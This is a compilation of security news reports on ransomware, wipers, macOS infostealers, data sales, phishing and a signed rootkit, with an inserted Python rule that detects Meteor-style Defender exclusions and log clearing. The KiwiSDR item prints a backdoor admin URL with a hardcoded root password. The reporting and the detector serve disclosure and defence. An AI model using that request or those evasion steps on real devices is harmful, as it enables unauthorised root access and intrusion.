
  1. Taiwanese motherboard maker Gigabyte has been hit by the RansomEXX ransomware gang, who threaten to publish 112GB of stolen data unless a ransom is paid.

     Gigabyte is best known for its motherboards but also manufactures other computer components and hardware, such as graphics cards, data center servers, laptops, and monitors.

     The attack occurred late Tuesday night into Wednesday and forced the company to shut down its systems in Taiwan. The incident also affected multiple websites of the company, including its support site and portions of the Taiwanese website.

     (Image: Gigabyte support down due to ransomware attack)

     Customers have also reported issues accessing support documents or receiving updated information about RMAs, which is likely due to the ransomware attack.

     According to the Chinese news site United Daily News, Gigabyte confirmed they suffered a cyberattack that affected a small number of servers. After detecting the abnormal activity on their network, they had shut down their IT systems and notified law enforcement.

     If you have first-hand information about this or other unreported cyberattacks, you can confidentially contact us on Signal at +16469613731 or on Wire at @lawrenceabrams-bc.

     Gigabyte suffers RansomEXX ransomware attack

     While Gigabyte has not officially stated what ransomware operation performed the attack, BleepingComputer has learned it was conducted by the RansomEXX gang.

     When the RansomEXX operation encrypts a network, they will create ransom notes on each encrypted device. These ransom notes contain a link to a non-public page meant to only be accessible to the victim to test the decryption of one file and to leave an email address to begin ransom negotiations.

     Today, a source sent BleepingComputer a link to a non-public RansomEXX leak page for Gigabytes Technologies, where the threat actors claim to have stolen 112GB of data during the attack.

     In a ransom note also seen by BleepingComputer, the threat actors state, "Hello, Gigabyte (gigabyte.com)!" and include the same link to the private leak page shared with us by our source.

     (Image: Non-public Gigabyte data leak page)

     On this non-public leak page, the threat actors claim to have stolen 112 GB of data from an internal Gigabyte network as well as the American Megatrends Git Repository:

     "We have downloaded 112 GB (120,971,743,713 bytes) of your files and we are ready to PUBLISH it. Many of them are under NDA (Intel, AMD, American Megatrends). Leak sources: newautobom.gigabyte.intra, git.ami.com.tw and some others."

     On the private data leak page, the threat actors also shared screenshots of four documents under NDA stolen during the attack. While we will not be posting the leaked images, the confidential documents include an American Megatrends debug document, an Intel "Potential Issues" document, an "Ice Lake D SKU stack update schedule," and an AMD revision guide.

     BleepingComputer has attempted to contact Gigabyte about the attack but has not heard back at this time.

     What you need to know about RansomEXX

     The RansomEXX ransomware operation originally started under the name Defray in 2018 but rebranded as RansomEXX in June 2020 when they became more active.

     Like other ransomware operations, RansomEXX will breach a network through Remote Desktop Protocol, exploits, or stolen credentials. Once they gain access to the network, they will harvest more credentials as they slowly gain control of the Windows domain controller.

     During this lateral spread through the network, the ransomware gang will steal data from unencrypted devices used as leverage in ransom extortions.

     RansomEXX does not only target Windows devices but has also created a Linux encryptor to encrypt virtual machines running on VMware ESXi servers.

     Over the past month, the RansomEXX gang has become more active as they have recently attacked Italy's Lazio region and Ecuador's state-run Corporación Nacional de Telecomunicación (CNT).

     Other high-profile attacks by the ransomware gang include Brazil's government networks, the Texas Department of Transportation (TxDOT), Konica Minolta, IPG Photonics, and Tyler Technologies.

     __________________
  2. The FBI Criminal Investigative Division and Securities and Exchange Commission warn investors of fraudsters impersonating registered investment professionals such as investment advisers and registered brokers.

     The end goal of these broker imposter schemes is to lure their targets into investment scams using spoofed sites, fake social media profiles, cold calling, and doctored documents.

     This warning was issued in collaboration with SEC's Office of Investor Education and Advocacy (OIEA), an SEC department designed to help individual investors protect themselves from securities fraud or abuse.

     "Fraudsters may falsely claim to be registered with the Securities and Exchange Commission (SEC), the Financial Industry Regulatory Authority (FINRA) or a state securities regulator in order to lure investors into scams, or even impersonate real investment professionals who actually are registered with these organizations," the FBI and SEC warned earlier this week.

     "Fraudsters may misappropriate the name, address, registration number, logo, photo, or website likeness of a currently or previously registered firm or investment professional."

     FBI and SEC's warning follows a similar fraud alert issued by FINRA this week regarding broker imposter scams using phishing sites impersonating brokers and doctored SEC or FINRA registration documents.

     (Image: Scam signs on falsified BrokerCheck report (FINRA))

     Investors are advised first to check if those reaching out with investment opportunities are licensed or registered with the Investor.gov search tool and confirm they're not a scammer by reaching out to the seller using independently verified contact information from the firm's Client Relationship Summary (Form CRS).

     Regardless of whether someone is registered with the SEC or they are only attempting to impersonate a registered investment professional, investors should always check for the following warning signs of an investment scam:

     • Guaranteed high investment returns: Promises of high investment returns – often accompanied by a guarantee of little or no risk – are a classic sign of fraud. Every investment has risk, and the potential for high returns usually comes with high risk.
     • Unsolicited offers: Unsolicited offers (you didn't ask for it and don't know the sender) to earn investment returns that seem "too good to be true" may be part of a scam.
     • Red flags in payment methods for investments: credit cards, digital asset wallets and "cryptocurrencies," wire transfers and checks.

     Investors are also urged to check the list of Impersonators of Genuine Firms maintained by the SEC, which—although not exhaustive as it doesn't include all unregistered entities, impersonators of genuine firms, fake regulators, or SEC-investigated entities—will likely help avoid some investment scam attempts.

     If you are the victim or have information on a broker imposter scheme, you can report possible securities fraud to the SEC and online fraud to the FBI's Internet Crime Complaint Center.

     "If you are suspicious about information you receive from an individual or firm soliciting your business, contact FINRA or another regulator BEFORE you send any personal or financial information," FINRA added.

     __________________
  3. A new file wiping malware called Meteor was discovered used in the recent attacks against Iran's railway system.

     Earlier this month, Iran's transport ministry and national train system suffered a cyberattack, causing the agency's websites to shut down and disrupting train service.

     The threat actors also displayed messages on the railway's message boards stating that trains were delayed or canceled due to a cyberattack. Some of these messages told passengers to call a phone number for more information, which is for the office of Supreme Leader Ali Khamenei.

     (Image: Hackers posting messages to the railway's message boards)

     In addition to trolling the railway, the threat actors locked Windows devices on the network with a lock screen that prevented access to the device.

     New Meteor wiper used in Iran attacks

     In a new report by SentinelOne, security researcher Juan Andres Guerrero-Saade revealed that the cyberattack on Iran utilized a previously unseen file wiper called Meteor.

     A wiper is malware that intentionally deletes files on a computer and causes it to become unbootable. Unlike ransomware attacks, destructive wiper attacks are not used to generate revenue for the attackers. Instead, their goal is to cause chaos for an organization or to distract admins while another attack is taking place.

     While Iranian cybersecurity firm Aman Pardaz previously analyzed the wiper, SentinelOne could find additional missing components to provide a clearer picture of the attack.

     "Despite a lack of specific indicators of compromise, we were able to recover most of the attack components described in the post along with additional components they had missed," explains Guerrero-Saade in SentinelOne's research. "Behind this outlandish tale of stopped trains and glib trolls, we found the fingerprints of an unfamiliar attacker."

     The attack itself is dubbed 'MeteorExpress,' and utilizes a toolkit of batch files and executables to wipe a system, lock the device's Master Boot Record (MBR), and install a screen locker.

     (Image: MeteorExpress attack chain)

     To start the attack, threat actors extracted a RAR archive protected with the 'hackemall' password. The attackers then added these files to a network share accessible to the rest of the computers on the Iranian railway's network.

     The threat actor then configured Windows group policies to launch a setup.bat batch file that would then copy various executables and batch files to the local device and execute them.

     (Image: Setup.bat batch file)

     As part of this process, the batch files would go through the following steps:

     • Check if Kaspersky antivirus was installed and terminate the attack if found.
     • Disconnect the device from the network.
     • Add Windows Defender exclusions to prevent the malware from being detected.
     • Extract various malware executables and batch files to the system.
     • Clear Windows event logs.
     • Delete a scheduled task called 'AnalyzeAll' under the Windows Power Efficiency Diagnostics directory.
     • Use the Sysinternals 'Sync' tool to flush the filesystem cache to the disk.
     • Launch the Meteor wiper (env.exe or msapp.exe), MBR locker (nti.exe), and screen locker (mssetup.exe) on the computer.

     When completed, the device will be unbootable, its files deleted, and a screen locker installed that displays the following wallpaper background before the computer is rebooted for the first time.

     (Image: MeteorExpress screen locker)

     While SentinelOne was unable to find the 'nti.exe' MBR locker, the researchers from Aman Pardaz claim that it shares overlap with the notorious NotPetya wiper.

     "One interesting claim in the Padvish blog is that the manner in which nti.exe corrupts the MBR is by overwriting the same sectors as the infamous NotPetya," explained Guerrero-Saade. "While one’s first instinct might be to assume that the NotPetya operators were involved or that this is an attempt at a false flag operation, it’s important to remember that NotPetya’s MBR corrupting scheme was mostly cribbed from the original Petya used for criminal operations."

     Initially thought to be a ransomware attack, NotPetya was a wiper that wreaked havoc across the globe in 2017 by spreading to exposed networks via NSA's ETERNALBLUE exploit and encrypting devices.

     In 2020, the USA indicted six Russian GRU intelligence operatives believed to be part of the elite Russian hacking group known as "Sandworm" for the NotPetya attack.

     At this time, the motive for the Meteor wiper attacks on Iran's railway is not clear, and the attacks have not been attributed to any particular group or country.

     "We cannot yet make out the shape of this adversary across the fog. Perhaps it’s an unscrupulous mercenary group. Or the latent effects of external training coming to bear on a region’s nascent operators," concludes SentinelOne's report. "At this time, any form of attribution is pure speculation and threatens to oversimplify a raging conflict between multiple countries with vested interests, means, and motive."

     __________________
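The host-preparation steps in the Meteor post (Defender exclusions added, event logs cleared, the 'AnalyzeAll' task deleted) are the part of the chain a defender can observe before the wiper runs. The Python correlation rule below is an added example, not code from SentinelOne, Aman Pardaz or the post itself. It runs over a handful of constructed Windows event records embedded inline and flags a host only when several of those indicators land inside one short window, since any one of them on its own (an admin adding an exclusion, say) is routine. The event IDs used (Windows Defender 5007 configuration change, Security 1102 audit log cleared, System 104 log cleared, Security 4699 scheduled task deleted) are standard Windows values; the message texts are constructed approximations of the real wording.

```python
"""Correlate the MeteorExpress host-preparation indicators in Windows events.

Added example: the events below are constructed for illustration, not real
telemetry from the railway attack. Event IDs are standard Windows values;
message texts are approximations of the real wording.
"""
from datetime import datetime, timedelta

# (timestamp, channel, event_id, message) -- constructed sample records
SAMPLE_EVENTS = [
    ("2021-07-09 06:01:10", "Security", 4624,
     "An account was successfully logged on."),
    ("2021-07-09 06:02:30", "Microsoft-Windows-Windows Defender/Operational", 5007,
     "Windows Defender Configuration has changed. New value: "
     "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ = 0x0"),
    ("2021-07-09 06:02:35", "Security", 4699,
     "A scheduled task was deleted. Task Name: "
     "\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll"),
    ("2021-07-09 06:02:50", "Security", 1102, "The audit log was cleared."),
    ("2021-07-09 06:03:00", "System", 104, "The System log file was cleared."),
]

# Routine activity only: one logon and an unrelated Defender setting change.
BENIGN_EVENTS = [
    ("2021-07-09 09:00:00", "Security", 4624,
     "An account was successfully logged on."),
    ("2021-07-09 09:05:00", "Microsoft-Windows-Windows Defender/Operational", 5007,
     "Windows Defender Configuration has changed. New value: "
     "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\... = 0x1"),
]

# Each indicator maps to one step of the batch-file sequence described above.
INDICATORS = {
    "defender_exclusion_added":
        lambda ch, eid, msg: eid == 5007 and "\\Exclusions\\" in msg,
    "security_log_cleared":
        lambda ch, eid, msg: ch == "Security" and eid == 1102,
    "system_log_cleared":
        lambda ch, eid, msg: ch == "System" and eid == 104,
    "analyzeall_task_deleted":
        lambda ch, eid, msg: eid == 4699 and msg.rstrip().endswith("AnalyzeAll"),
}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def match_indicators(events):
    """Return a time-sorted list of (time, indicator_name) for every hit."""
    hits = []
    for ts, ch, eid, msg in events:
        for name, pred in INDICATORS.items():
            if pred(ch, eid, msg):
                hits.append((_ts(ts), name))
    return sorted(hits)


def correlate(events, window_minutes=10, min_distinct=3):
    """Slide a time window over the hits and report the largest set of
    distinct indicators seen inside one window, plus whether that set
    reaches the threshold. The sequence, not any single event, is what
    resembles the wiper's preparation phase."""
    hits = match_indicators(events)
    window = timedelta(minutes=window_minutes)
    best = set()
    for i, (start, _) in enumerate(hits):
        names = {name for t, name in hits[i:] if t - start <= window}
        if len(names) > len(best):
            best = names
    return {"indicators": sorted(best), "meteor_like": len(best) >= min_distinct}


if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
    print(correlate(BENIGN_EVENTS))
```

In a real deployment the same rule would read from a SIEM or from exported EVTX records rather than an inline list; the window and threshold are starting points to tune against the environment's own baseline of exclusion changes and log maintenance.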
  4. Security researchers have published details about the method used by a strain of macOS malware to steal login information from multiple apps, enabling its operators to steal accounts.

     Dubbed XCSSET, the malware keeps evolving and has been targeting macOS developers for more than a year by infecting local Xcode projects.

     Stealing Telegram accounts, Chrome passwords

     XCSSET collects from infected computers files with sensitive information belonging to certain applications and sends them to the command and control (C2) server.

     One of the targeted apps is the Telegram instant messaging software. The malware creates the archive “telegram.applescript” for the “keepcoder.Telegram” folder under the Group Containers directory.

     Collecting the Telegram folder allows the hackers to log into the messaging app as the legitimate owner of the account. Researchers at Trend Micro explain that copying the stolen folder on another machine with Telegram installed gives the attackers access to the victim’s account.

     XCSSET can steal sensitive data this way because normal users can access the Application sandbox directory with read and write permissions.

     “Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory” - Trend Micro

     The researchers also analyzed the method used to steal the passwords saved in Google Chrome, a technique that requires user interaction and has been described since at least 2016.

     The threat actor needs to get the Safe Storage Key, which is stored in the user’s keychain as “Chrome Safe Storage.” However, they use a fake dialog to trick the user into giving administrator privileges to all of the attacker’s operations necessary to get the Safe Storage Key that can decrypt passwords stored in Chrome. Once decrypted, all the data is sent to the attacker’s command and control server.

     Similar scripts exist in XCSSET for stealing sensitive data from other apps: Contacts, Evernote, Notes, Opera, Skype, WeChat.

     Trend Micro researchers say that the latest version of XCSSET they analyzed also has an updated list of C2 servers and a new “canary” module for cross-site scripting (XSS) injections in the experimental Chrome Canary web browser.

     While the recent updates of the malware are far from adding significant features, they show that XCSSET is evolving and adapting continuously. XCSSET is targeting the latest macOS version (currently Big Sur) and has been seen in the past leveraging a zero-day vulnerability to circumvent protections for full disk access and avoid explicit consent from the user.

     __________________
  5. Attackers have stolen 1 TB of proprietary data belonging to Saudi Aramco and are offering it for sale on the darknet.

     The Saudi Arabian Oil Company, better known as Saudi Aramco, is one of the largest public petroleum and natural gas companies in the world. The oil giant employs over 66,000 employees and brings in almost $230 billion in annual revenue.

     The threat actors are offering Saudi Aramco's data starting at a negotiable price of $5 million. Saudi Aramco has pinned this data incident on third-party contractors and tells BleepingComputer that the incident had no impact on Aramco's operations.

     "Zero-day exploitation" used to breach network

     This month, a threat actor group known as ZeroX is offering 1 TB of proprietary data belonging to Saudi Aramco for sale.

     ZeroX claims the data was stolen by hacking Aramco's "network and its servers," sometime in 2020. As such, the files in the dump are as recent as 2020, with some dating back to 1993, according to the group.

     When asked by BleepingComputer as to what method was used to gain access to the systems, the group did not explicitly spell out the vulnerability but instead called it "zero-day exploitation."

     To create traction among prospective buyers, a small sample set of Aramco's blueprints and proprietary documents with redacted PII were first posted on a data breach marketplace forum in June this year:

     (Image: Forum post with a link to the dark web leak site (BleepingComputer))

     However, at the time of initial posting, the .onion leak site had a countdown timer set to 662 hours, or about 28 days, after which the sale and negotiations would begin.

     ZeroX told BleepingComputer that the choice of "662 hours" was intentional and a "puzzle" for Saudi Aramco to solve, but the exact reason behind the choice remains unclear:

     (Image: Threat actors announced data would be up for sale after 662 hours (BleepingComputer))

     The group says that the 1 TB dump includes documents pertaining to Saudi Aramco's refineries located in multiple Saudi Arabian cities, including Yanbu, Jazan, Jeddah, Ras Tanura, Riyadh, and Dhahran. And, that some of this data includes:

     • Full information on 14,254 employees: name, photo, passport copy, email, phone number, residence permit (Iqama card) number, job title, ID numbers, family information, etc.
     • Project specification for systems related to/including electrical/power, architectural, engineering, civil, construction management, environmental, machinery, vessels, telecom, etc.
     • Internal analysis reports, agreements, letters, pricing sheets, etc.
     • Network layout mapping out the IP addresses, Scada points, Wi-Fi access points, IP cameras, and IoT devices.
     • Location map and precise coordinates.
     • List of Aramco's clients, along with invoices and contracts.

     (Image: Samples of stolen Saudi Aramco data and blueprints shared on leak site (BleepingComputer))

     Samples released by ZeroX on the leak site have personally identifiable information (PII) redacted, and a 1 GB sample alone costs US$2,000, paid as Monero (XMR). The threat actor, however, did share a few recent unredacted documents with BleepingComputer for confirmation.

     The price of the entire 1 TB dump is set at US$5 million, although the threat actors say the amount is negotiable. A party requesting an exclusive, one-off sale (i.e. obtain the complete 1 TB dump and demand it be wiped completely from ZeroX's end) is expected to pay a whopping US$50 million.

     ZeroX shared with BleepingComputer that up until this point, they have been negotiating the sale with five buyers.

     Not a ransomware or extortion incident

     Contrary to some claims floating around on the internet [1, 2] labeling this incident a "ransomware attack," it is not. Both the threat actor and Saudi Aramco have confirmed to BleepingComputer that this is not a ransomware incident.

     Saudi Aramco told BleepingComputer that the data breach occurred at third-party contractors, rather than direct exploitation of Aramco's systems:

     "Aramco recently became aware of the indirect release of a limited amount of company data which was held by third party contractors."

     "We confirm that the release of data has no impact on our operations, and the company continues to maintain a robust cybersecurity posture," an Aramco spokesperson told BleepingComputer.

     Mysteriously enough, the threat actors did not even inform Saudi Aramco of the stolen data, or attempt extortion after gaining access to their networks, which further casts doubts on the purpose of the timer shown above. It seems the countdown timer was merely set up as a lure for prospective buyers, to generate an initial buzz around the sale.

     In 2012, a prominent data breach against Saudi Aramco's systems wiped over 30,000 computer hard drives clean. The cyberwarfare incident conducted via the Shamoon virus was allegedly linked to Iran.

     In more recent times, attacks on mission-critical infrastructure like the Colonial Pipeline and the largest U.S. propane provider, AmeriGas, have prompted a need for stepping up cybersecurity efforts at these facilities.

     __________________
  6. Moldova's "Court of Accounts" has suffered a cyberattack leading to the agency's public databases and audits being destroyed.

     The Court of Accounts of Moldova is a government authority that performs audits of public financial resources and government agencies to comply with international standards.

     Yesterday, Moldova's state news agency Moldpres reported on behalf of the Court of Accounts that their website was hacked, and threat actors destroyed audit reports and other public data.

     “It is for the first time when the supreme audit institution faces such a situation. The destruction of the public page took place in the context of important audits and with impact in the society, at the stage of reporting and making public of the most significant audit missions planned in the institution’s work,” the Court of Accounts said.

     The attack has led the agency to shut down its website while the incident is investigated and data can be restored.

     (Image: Website for Court of Accounts)

     The agency states that they are investigating whether the attack was arbitrary, done for extortion, or to disrupt their work.

     "The needed investigations will identify whether the attack has been organized by hackers arbitrarily, on purposes of blackmailing, or it is about a planned order, in order to create impediments to the work of the country’s supreme audit institution," said the Court of Accounts.

     While this cyberattack was destructive for the Court of Accounts, the threat actors could have caused further damage by using the site to distribute malware to visitors.

     Last week, researchers from T&T Security disclosed that the Kazakhstan government's 'Open Budgets' website used by government agencies and local government branches to publish budget reports was hacked to distribute malicious office documents that installed malware.

     __________________
  7. The author of a popular software-defined radio (SDR) project has removed a "backdoor" from radio devices that granted root-level access.

     The backdoor had been, according to the author, present in all versions of KiwiSDR devices for the purposes of remote administration and debugging.

     Last night, the author pushed out a "bug fix" on the project's GitHub aimed at removing this backdoor silently, which sparked some backlash. Since then, the author's original forum posts and comments with any mention of "backdoor" have been removed over the last few hours.

     Hardcoded password gives root access to all devices

     KiwiSDR is a software-defined radio that can be attached to an embedded computer, like the Seeed BeagleBone Green (BBG). It is provided either as a standalone board or a more complete version featuring the BBG, a GPS antenna, and an enclosure.

     (Image: KiwiSDR user interface with different RF controls)

     SDRs are aimed at replacing radio frequency (RF) communication hardware with software or firmware for carrying out signal processing activities that would normally require hardware devices. The concept is analogous to software-defined networking.

     Yesterday, Mark Jessop, an RF engineer and radio operator, came across an interesting forum post in which the author of the KiwiSDR project admitted to having remote access to all radio receiver devices running the software.

     Another user, M., dug out a 2017 forum thread where KiwiSDR's developer admitted that a backdoor indeed provided them with remote access to all KiwiSDR devices.

     Although the entire KiwiSDR forum site has become inaccessible as of today, an archived copy of the forum post seen by BleepingComputer confirms the contents of the tweet:

     (Image: KiwiSDR software author stated there's a backdoor in all devices giving them remote access)

     Furthermore, as of today, over 600 KiwiSDR devices are online with the backdoor still present in them, as highlighted by Hacker Fantastic.

     Although these devices are mainly acting as radio receivers, it is worth noting that any remote actor who logs in using the hardcoded master password is granted root-level access to the device's (Linux-based) console. This can enable adversaries to probe into the IoT devices, take them over, and begin traversing adjacent networks the radio devices are connected to:

     "These KiwiSDRs are used for receiving HF radio stations. The backdoor itself doesn't give an attacker any special SDR access, just that they can access the console of the device (Linux) and start pivoting into networks," ethical hacker xssfox told BleepingComputer.

     An image of the KiwiSDR administration panel obtained by BleepingComputer shows console level access with root access (notice the #) is possible:

     (Image: KiwiSDR remote admin panel provides root access to the device console)

     A video created by xssfox demonstrates how the backdoor can be exploited via a simple HTTP GET request, which looks like:

     Code: http://radio-device-domain.example.com:8074/admin?su=kconbyp

     Note: the superuser password (kconbyp) shown above is an older password, the SHA256 hash of which used to be present on KiwiSDR devices. The more recent hash (shown below) is different, indicating "kconbyp" won't work on later versions of KiwiSDR and that a newer master password has been present.

     Dev pushes out "bug fix" overnight removing the backdoor

     As seen by BleepingComputer, as of a few hours ago a fix has been committed to KiwiSDR's GitHub project removing the backdoor code. The update removes multiple administrative functions, and specifically the code that compares the provided master password against its SHA256 hash:

     (Image: KiwiSDR author removes hardcoded password from devices (GitHub))

     Jessop clarified that there is no indication of KiwiSDR's author having misused the backdoor access, which had been introduced with the intention of debugging KiwiSDR devices in good faith. He further said the KiwiSDR developer has been extremely responsive in patching bugs and adding features.

     But, like others, the engineer did express concerns that the master password would transmit over HTTP, enabling any Man-in-the-Middle (MitM) threat actor to potentially intercept it and consequently gain remote access to all devices.

     Some Redditors also expressed that backdoors were never okay, regardless of whether HTTPS was in use:

     "No way. Back doors are never okay. Password was sent in the clear, as HTTPS isn't supported. Eventually someone would have exploited this. Hell, someone might have already exploited this and we just don't know about it," said one of the users in a thread.

     KiwiSDR users should upgrade to the latest version v1.461 released today on GitHub that removes the backdoor from their radio devices.

     __________________
  8. Kaseya has warned customers that an ongoing phishing campaign attempts to breach their networks by spamming emails bundling malicious attachments and embedded links posing as legitimate VSA security updates.

     "Spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments," the company said in an alert issued on Thursday evening.

     "Do not click on any links or download any attachments claiming to be a Kaseya advisory. Moving forward, Kaseya email updates will not contain any links or attachments."

     Attackers try to backdoor recipients' systems

     While the company did not provide additional details regarding these attacks, the warning perfectly lines up with another series of malspam emails targeting Kaseya customers with Cobalt Strike payloads.

     As BleepingComputer first reported, Malwarebytes Threat Intelligence researchers have recently discovered a series of phishing attacks trying to take advantage of the ongoing Kaseya ransomware crisis.

     "A malspam campaign is taking advantage of Kaseya VSA ransomware attack to drop CobaltStrike," Malwarebytes researchers said. "It contains an attachment named 'SecurityUpdates.exe' as well as a link pretending to be security update from Microsoft to patch Kaseya vulnerability!"

     (Image: Kaseya phishing email sample (Malwarebytes))

     The attackers' end goal is to deploy Cobalt Strike beacons on the recipients' devices to backdoor them and steal sensitive info or deliver more malware payloads.

     Once the targets run the malicious attachment or download and execute the fake Microsoft update on their devices, the attackers gain persistent remote access to the now compromised systems.

     In June, following the Colonial Pipeline attack, threat actors also used fake system updates claiming to help block ransomware infections.

     These two campaigns highlight that cybercriminals behind phishing attacks keep up with the latest news to push lures relevant to recent events to boost their campaigns' success rates.

     Given that Kaseya has so far failed to deploy a fix for the VSA zero-day exploited by REvil, some of its customers might fall for this campaign's tricks in their effort to protect their networks from attacks.

     Light at the end of the tunnel

     The highly-publicized REvil ransomware attack that hit Kaseya and approximately 1,500 of their direct customers and downstream businesses makes for a perfect lure theme.

     After the attack was disclosed, CISA and the FBI shared guidance on how to deal with the attack's aftermath, and the White House National Security Council is urging victims to follow the guidance issued by Kaseya and report incidents to the FBI.

     However, despite the attack's massive reach, which has led to some calling it the largest ransomware attack ever, multiple victims told BleepingComputer that their backups were not affected, and they are restoring systems rather than paying a ransom.

     Victims who do ultimately pay REvil's ransoms will likely only do so because their backups failed or they had no backups to begin with.

     __________________
  9. The REvil ransomware gang is increasing the ransom demands for victims encrypted during Friday's Kaseya ransomware attack.

     When conducting an attack against a business, ransomware gangs, such as REvil, typically research a victim by analyzing stolen and public data for financial information, cybersecurity insurance policies, and other information.

     Using this information, the number of encrypted devices, and the amount of stolen data, the threat actors will come up with a high-ball ransom demand that they believe, after negotiations, the victim can afford to pay.

     However, with Friday's attack on Kaseya VSA servers, REvil targeted the managed service providers and not their customers. Due to this, the threat actors could not determine how much of a ransom they should demand from the encrypted MSP customers.

     As a solution, it seems the ransomware gang created a base ransom demand of $5 million for MSPs and a much smaller ransom of $44,999 for the MSP's customers who were encrypted.

     (Image: Ransom demand for Kaseya ransomware victims)

     It turns out this $44 thousand number is irrelevant, as in numerous negotiation chats shared with and seen by BleepingComputer, the ransomware gang is not honoring these initial ransom demands.

     When encrypting a victim's network, REvil can use multiple encrypted file extensions during the attack. The threat actors typically provide a decryptor that can decrypt all extensions on the network after a ransom is paid.

     For victims of the Kaseya ransomware incident, REvil is doing things differently and demanding between $40,000 and $45,000 per individual encrypted file extension found on a victim's network.

     (Image: A portion of REvil ransom negotiation)

     For one victim who stated they had over a dozen encrypted file extensions, the ransomware gang demanded a $500,000 ransom to decrypt the entire network.

     (Image: $500,000 ransom to decrypt the entire network)

     However, the good news is that the REvil representatives have told victims that they only encrypted networks, and nothing more. This means that REvil likely did not steal any of the victims' data, as they are known to use that as leverage in ransomware negotiations immediately.

     (Image: REvil indicates data was not stolen)

     This also indicates that the ransomware operation did not access the victim's networks before the attack. Instead, they likely remotely exploited the Kaseya VSA vulnerability to distribute the encryptor and execute it on the victim's devices.

     Attack's aftermath

     Since the attacks on Friday, Kaseya has been working on releasing a patch for the zero-day vulnerability exploited in the REvil attack. This zero-day was discovered by DIVD researchers who disclosed it to Kaseya and helped test the patch.

     Unfortunately, REvil found the vulnerability simultaneously and launched their attack on Friday before the patch was ready, just in time for the US Fourth of July holiday weekend.

     It is believed that over 1,000 businesses have been affected by the attack, including attacks on the Swedish Coop supermarket chain, which had to close approximately 500 stores, a Swedish pharmacy chain, and the SJ transit system.

     President Biden has directed US intelligence agencies to investigate the attack but has not gone as far as to state that the attacks originated from Russia.

     The FBI also announced today that they are investigating the incident and working closely with CISA and other agencies.

     "The FBI is investigating the Kaseya ransomware incident and working closely with CISA and other interagency partners to understand the scope of the threat."

     "If you believe your systems have been compromised, we encourage you to employ all recommended mitigations, follow Kaseya's guidance to shut down your VSA servers immediately and report to the FBI at ic3.gov," said the FBI in a press statement.

     __________________
  10. Dutch cybersecurity firm Tesorion has released a free decryptor for the Lorenz ransomware, allowing victims to recover some of their files for free without paying a ransom.

Lorenz is a human-operated ransomware that began operating in April 2021 and has since listed twelve victims whose data they have stolen and leaked on their ransomware data leak site.

Lorenz ransomware data leak site

Lorenz is not particularly active and has begun to taper off in recent months compared to other operations.

Lorenz ransomware decryptor released

The Lorenz ransomware decryption tool can be downloaded from NoMoreRansom and will allow victims to recover some of their encrypted files.

Unlike other ransomware decryptors that include the actual decryption key, Tesorion's decryptor operates differently and can only decrypt certain file types.

Tesorion researcher Gijs Rijnders told BleepingComputer that only files with well-known file structures could be decrypted, such as Office documents, PDF files, some image types, and movie files.

While the decryptor will not decrypt every file type, it will still allow those who do not pay the ransom to recover important files.

As you can see below, the decryptor can decrypt well-known file types, such as XLS and XLSX files, without a problem. However, it will not decrypt unknown file types or those with uncommon file structures.

Lorenz ransomware decryptor

In addition to providing a decryptor, Tesorion provided insight into the encryption technique used by the Lorenz ransomware.

In a blog post, Rijnders explains that a bug in how they implement their encryption can cause data to become lost, which would prevent a file from being decrypted even if a ransom was paid.

"The result of this bug is that for every file which’s size is a multiple of 48 bytes, the last 48 bytes are lost. Even if you managed to obtain a decryptor from the malware authors, these bytes cannot be recovered," explains Rijnders.

__________________
  11. Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs.

G Data malware analyst Karsten Hahn first took notice of this event last week and was joined by the wider infosec community in tracing and analyzing the malicious drivers bearing the seal of Microsoft.

It turns out the C2 infrastructure belongs to a company classified under "Communist Chinese military" by the US Department of Defense.

This incident has once again exposed threats to software supply-chain security, except this time it stemmed from a weakness in Microsoft's code-signing process.

"Netfilter" driver is rootkit signed by Microsoft

Last week, G Data's cybersecurity alert systems flagged what appeared to be a false positive, but was not—a Microsoft-signed driver called "Netfilter."

The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions.

This is when G Data's malware analyst Karsten Hahn shared this publicly and simultaneously contacted Microsoft:

The malicious binary has been signed by Microsoft (VirusTotal)

"Since Windows Vista, any code that runs in kernel mode is required to be tested and signed before public release to ensure stability for the operating system."

"Drivers without a Microsoft certificate cannot be installed by default," states Hahn.

At the time, BleepingComputer began observing the behavior of C2 URLs and also contacted Microsoft for a statement.

The first C2 URL returns a set of more routes (URLs) separated by the pipe ("|") symbol:

Navigating to the C2 URL presents more routes for different purposes

Each of these serves a purpose, according to Hahn: The URL ending in "/p" is associated with proxy settings, "/s" provides encoded redirection IPs, "/h?" is for receiving CPU-ID, "/c" provided a root certificate, and "/v?" is related to the malware's self-update functionality.

As seen by BleepingComputer, for example, the "/v?" path provided the URL to the malicious Netfilter driver in question itself (living at "/d3"):

Path to malicious Netfilter driver

The G Data researcher spent some time sufficiently analyzing the driver and concluded it to be malware. The researcher has analyzed the driver, its self-update functionality, and Indicators of Compromise (IOCs) in a detailed blog post.

"The sample has a self-update routine that sends its own MD5 hash to the server via hxxp://," says Hahn. An example request would look like this:

Code: hxxp://

"The server then responds with the URL for the latest sample, e.g. hxxp:// or with 'OK' if the sample is up-to-date. The malware replaces its own file accordingly," further explained the researcher.

Malware's self-update functionality analyzed by G Data

During the course of his analysis, Hahn was joined by other malware researchers including Johann Aydinbas, Takahiro Haruyama, and Florian Roth.

Roth was able to gather the list of samples in a spreadsheet and has provided YARA rules for detecting these in your network environments.

Notably, the C2 IP that the malicious Netfilter driver connects to belonged to Ningbo Zhuo Zhi Innovation Network Technology Co., Ltd, according to WHOIS records.

The U.S. Department of Defense (DoD) has previously marked this organization as a "Communist Chinese military company," another researcher @cowonaut observed.

Microsoft admits to signing the malicious driver

Microsoft is actively investigating this incident, although thus far, there is no evidence that stolen code-signing certificates were used.

The mishap seems to have resulted from the threat actor following Microsoft's process to submit the malicious Netfilter drivers, and managing to acquire the Microsoft-signed binary in a legitimate manner:

"Microsoft is investigating a malicious actor distributing malicious drivers within gaming environments."

